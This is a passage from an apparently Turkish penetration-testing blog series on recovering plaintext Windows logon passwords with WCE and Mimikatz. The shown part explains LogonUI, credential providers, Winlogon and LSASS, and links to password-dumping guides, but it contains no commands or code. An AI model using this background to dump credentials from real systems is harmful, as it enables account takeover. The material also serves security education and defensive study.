kullanıcılar bu oturumlarla etkileşim halinde olmadığı için bu oturumlara ait LogonUI prosesleri çalışmaya devam eder.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGBAskrnjVUSmOcahwP59-pbesQ5VOzl9-nOGukV7dGnKbLavtuttXiOuNxhRHf51Y9Fsn83p-TxsIgPc47m0t_ac2OpIJlHhjaWzfOAq05ED1iSwQVnlYgVhx8glc21A0z8le2Ielej0/s1600/Wce%2526Mimikatz_06.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGBAskrnjVUSmOcahwP59-pbesQ5VOzl9-nOGukV7dGnKbLavtuttXiOuNxhRHf51Y9Fsn83p-TxsIgPc47m0t_ac2OpIJlHhjaWzfOAq05ED1iSwQVnlYgVhx8glc21A0z8le2Ielej0/s400/Wce%2526Mimikatz_06.jpg" width="400" /></a></div><br /><div style="text-align: justify;">LogonUI adında yeni bir proses oluşturulması sayesinde; kimlik doğrulama işlemi sırasında gerçekleşecek bir hatadan dolayı, Winlogon prosesi (ve tüm sistemin) beklenmedik şekilde sonlanmaması sağlanacaktır. Ayrıca, Winlogon prosesinin bellek alanında harici bir DLL’in kullanılmasından vazgeçilmesi, DLL açıklığından kaynaklı bir kötüye kullanımın da önüne geçmeyi amaçlamaktadır.</div><br /><div style="text-align: justify;">Yeni oturum açma mimarisinde göze çarpan bir iyileştirme de kimlik bilgisi sağlayıcılarıdır (Credential Providers - CP). Kimlik bilgisi sağlayıcıları, LogonUI prosesi tarafından yüklenirler ve Kayıt Defteri’ndeki “HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers” anahtarı altında listelenirler.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKqfdNj0nA5O9ptv0qfTSmKlMABZ_qtFdGb4N5pJipNDOEvs_lPARNxSXU9tkghPOWjg2UC3nzmmdSaEzS4PhPZ9oEp2QUUFxbXTnO-AwfIYMvF01J-7iPhxGG0kusbMkeAW_tASRewkw/s1600/Wce%2526Mimikatz_07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKqfdNj0nA5O9ptv0qfTSmKlMABZ_qtFdGb4N5pJipNDOEvs_lPARNxSXU9tkghPOWjg2UC3nzmmdSaEzS4PhPZ9oEp2QUUFxbXTnO-AwfIYMvF01J-7iPhxGG0kusbMkeAW_tASRewkw/s400/Wce%2526Mimikatz_07.png" width="400" /></a></div><br /><div style="text-align: justify;">Örneğin, GUID değeri “{6f45dc1e-5384-457a-bc13-2cd81b0d28ed}” olan sağlayıcı, varsayılan olarak parola bilgilerini alan sağlayıcıya (PasswordProvider) aittir. Bunun yanında akıllı kartlar, sertifikalar, biyometrik sistemler için de, Wİndows işletim sistemi tarafından kimlik bilgi sağlayıcıları kullanıma sunulmuştur.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Winlogon prosesi, LogonUI prosesini oluşturduğunda, LogonUI prosesi Kayıt Defteri’nden etkin olan kimlik bilgisi sağlayıcılarının listesini alır. Her bir sağlayıcı, LogonUI prosesine ihtiyacı olan arayüz bileşenlerini (metin kutusu, kontrol kutusu, buton vs) belirtir. LogonUI prosesi de bu teleplere uygun olarak bir arayüz oluşturur. Örnek bir arayüz aşağıdaki gibidir:</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt_1vAvhU7eTClTBbRVWfkCgE39Hg9Q22ViwM2FarKXxMaW3H9ZP0hhjbmXVESmPfagdkuKATAMXCwzwiK91b4eBYmENOiyLFC_rkhnsCW5I3nW3yXpXCYrksFWWwhthsS-WCvJGSLgAM/s1600/Wce%2526Mimikatz_08.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt_1vAvhU7eTClTBbRVWfkCgE39Hg9Q22ViwM2FarKXxMaW3H9ZP0hhjbmXVESmPfagdkuKATAMXCwzwiK91b4eBYmENOiyLFC_rkhnsCW5I3nW3yXpXCYrksFWWwhthsS-WCvJGSLgAM/s400/Wce%2526Mimikatz_08.jpg" width="400" /></a></div><br /><div style="text-align: justify;">Kullanıcı karşısına gelen arayüzde kimlik bilgilerini (kullanıcı adı, parola, parmak izi, retina, PIN, sertifika, vs) girer. Kimlik bilgi sağlayıcıları (CP); bu bilgileri alır, özel bir formata koyar (serialization). Daha sonra da, kimlik bilgi sağlayıcıları bu bilgileri, LogonUI prosesi aracılığıyla (veya direk olarak) Winlogon prosesine ulaşır. Winlogon prosesi de bu bilgileri, sıfırıncı oturumda çalışan LSASS prosesine göndererek kimlik doğrulama işleminde aracılık gerçekleştirir.</div><br />Oturum açma konusunda bu zamana dek bahsedilen işlemler aşağıdaki resimde özetlenmiştir.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiREc22iKPNRYrVH9F1DOpNVkLYR2sz5IbTIlvF0X0K1MpOr4Uioq1tohmG2WNnBOy4GaYDjLjRybKuTFmr8omQPcozfSVY9jwsbpy4ihqv100XnZVUvmRUjvK244SbcSVZ2grCWHqFG0s/s1600/Wce%2526Mimikatz_09.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiREc22iKPNRYrVH9F1DOpNVkLYR2sz5IbTIlvF0X0K1MpOr4Uioq1tohmG2WNnBOy4GaYDjLjRybKuTFmr8omQPcozfSVY9jwsbpy4ihqv100XnZVUvmRUjvK244SbcSVZ2grCWHqFG0s/s400/Wce%2526Mimikatz_09.jpg" width="400" /></a></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Özetle, yukarıdaki işlemler sonucunda kimlik bilgileri LSASS.exe prosesine aktarılmış olur. Bu noktadan sonra kimlik doğrulama paketleri (authentication packages) ve kimlik verilerinin tutulduğu veritabanları (SAM dosyası, Aktif Dizin gibi) devreye girer. Bu konular sonraki yazıda ele alınacaktır.</div><br /><b>Kaynaklar: </b><br /><a href="http://www.bilgiguvenligi.gov.tr/microsoft-guvenligi/windows-isletim-sisteminde-oturum-acma-islemi-winlogon.html" target="_blank"> http://www.bilgiguvenligi.gov.tr/microsoft-guvenligi/windows-isletim-sisteminde-oturum-acma-islemi-winlogon.html </a> <br /><a href="http://msdn.microsoft.com/tr-tr/magazine/cc163489(en-us).aspx" target="_blank"> http://msdn.microsoft.com/tr-tr/magazine/cc163489(en-us).aspx </a> <br /><a href="http://technet.microsoft.com/en-us/library/ff404303(v=ws.10).aspx" target="_blank"> http://technet.microsoft.com/en-us/library/ff404303(v=ws.10).aspx </a> <br /><a href="http://blog.bga.com.tr/2013/01/mimikatz-ile-windows-sistemlerde.html" target="_blank"> http://blog.bga.com.tr/2013/01/mimikatz-ile-windows-sistemlerde.html</a><br /><a href="http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html" target="_blank"> http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html </a> <br /><a href="http://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx" target="_blank"> http://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx </a> <br /><a href="http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf" target="_blank"> http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf </a> <br /><a href="http://www.ampliasecurity.com/research/WCE_Internals_RootedCon2011_ampliasecurity.pdf" target="_blank"> http://www.ampliasecurity.com/research/WCE_Internals_RootedCon2011_ampliasecurity.pdf </a> <br /><a href="http://codeidol.com/community/windows/logon/25019/" target="_blank">http://codeidol.com/community/windows/logon/25019/</a><br /><a href="http://fr.slideshare.net/gentilkiwi/mimikatz-asfws" target="_blank"> http://fr.slideshare.net/gentilkiwi/mimikatz-asfws </a> <br /><a href="http://danielaelmi.altervista.org/password-cracking-hashes-dumping-brute-forcing-auditing-and-privileges-escalation/" target="_blank"> http://danielaelmi.altervista.org/password-cracking-hashes-dumping-brute-forcing-auditing-and-privileges-escalation/ </a> <br /><a href="http://www.blackhat.com/presentations/bh-dc-09/Muckin/BlackHat-DC-09-Muckin-vista-security-internals.pdf" target="_blank"> http://www.blackhat.com/presentations/bh-dc-09/Muckin/BlackHat-DC-09-Muckin-vista-security-internals.pdf</a>

WCE ve Mimikatz Kullanarak Windows Oturum Parolalarının Açık Halde Elde Edilmesi #1

Etki alanı sızma testlerinde ele geçirilen bir bilgisayardan diğer bilgisayarlara yayılma işlemlerinde PTH (Pass-The-Hash) adı verilen yönte...

Read more »